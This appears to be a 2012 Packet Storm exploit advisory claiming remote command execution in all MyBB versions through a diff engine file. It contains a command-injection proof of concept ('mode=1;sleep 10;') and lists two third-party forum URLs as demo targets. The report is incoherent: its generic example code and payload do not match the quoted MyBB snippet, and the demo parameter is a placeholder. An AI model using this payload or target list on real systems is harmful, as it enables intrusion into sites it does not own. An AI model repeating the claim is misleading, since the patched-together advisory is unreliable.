MyBB Remote Command Execution

2012-10-04T00:00:00
ID PACKETSTORM:117114
Type packetstorm
Reporter Nafsh
Modified 2012-10-04T00:00:00

Description

                                        
                                            `ÿþ#########################################################  
  
Exploit Title : Mybb All Versions Remote Command Execution  
  
Author : Nafsh  
  
Discovered By : Tapco Security & Research Lab  
  
Date : 3 Oct 2012  
  
Home : http://Sec-Lab.Tap-Co.Net  
  
Contact : Nafsh.Hack@Gmail.com  
  
#########################################################  
  
Source : http://www.mybb.com/download/latest  
  
  
  
file : /inc/3rdparty/diff/Diff/Engine/shell.php  
  
  
  
Source Of Bug :   
  
$fp = fopen($to_file, 'w');  
  
fwrite($fp, implode("\n", $to_lines));  
  
fclose($fp);  
  
$diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);  
  
unlink($from_file);  
  
unlink($to_file);  
  
#########################################################  
  
vulnerability concept:  
  
  
  
$_GET + shell_exec() = Command Execution  
  
  
  
vulnerability description:  
  
  
  
An attacker might execute arbitrary system commands with this vulnerability. User tainted data is used when creating the command that will be executed on the underlying operating system. This vulnerability can lead to full server compromise.  
  
  
  
vulnerable example code :  
  
1: exec("./crypto -mode " . $_GET["mode"]);   
  
  
  
proof of concept :  
  
  
  
/index.php?mode=1;sleep 10;  
  
  
  
patch:  
  
  
  
Limit the code to a very strict character subset or build a whitelist of allowed commands. Do not try to filter for evil commands. Try to avoid the usage of system command executing functions if possible.  
  
  
  
1: $modes = array("r", "w", "a"); if(!in_array($_GET["mode"], $modes)) exit ;   
  
r  
  
#########################################################  
  
D3m0 :   
  
  
  
http://www.minuteworkers.com/forum/inc/3rdparty/diff/Diff/Engine/shell.php?Find It In Source=RCE  
  
  
  
http://www.artistsuniverse.org/forum/inc/3rdparty/diff/Diff/Engine/shell.php?Find It In Source=RCE  
  
#########################################################  
  
We are : K0242 | Nafsh | Ehram.shahmohamadi  
  
#########################################################  
  
Tnx : Am!r | M.R.S.CO All Members In Www.IrIsT.Ir & Www.IdC-TeAm.NeT  
  
#########################################################  
  
Greetz : All sec-lab researchers  
`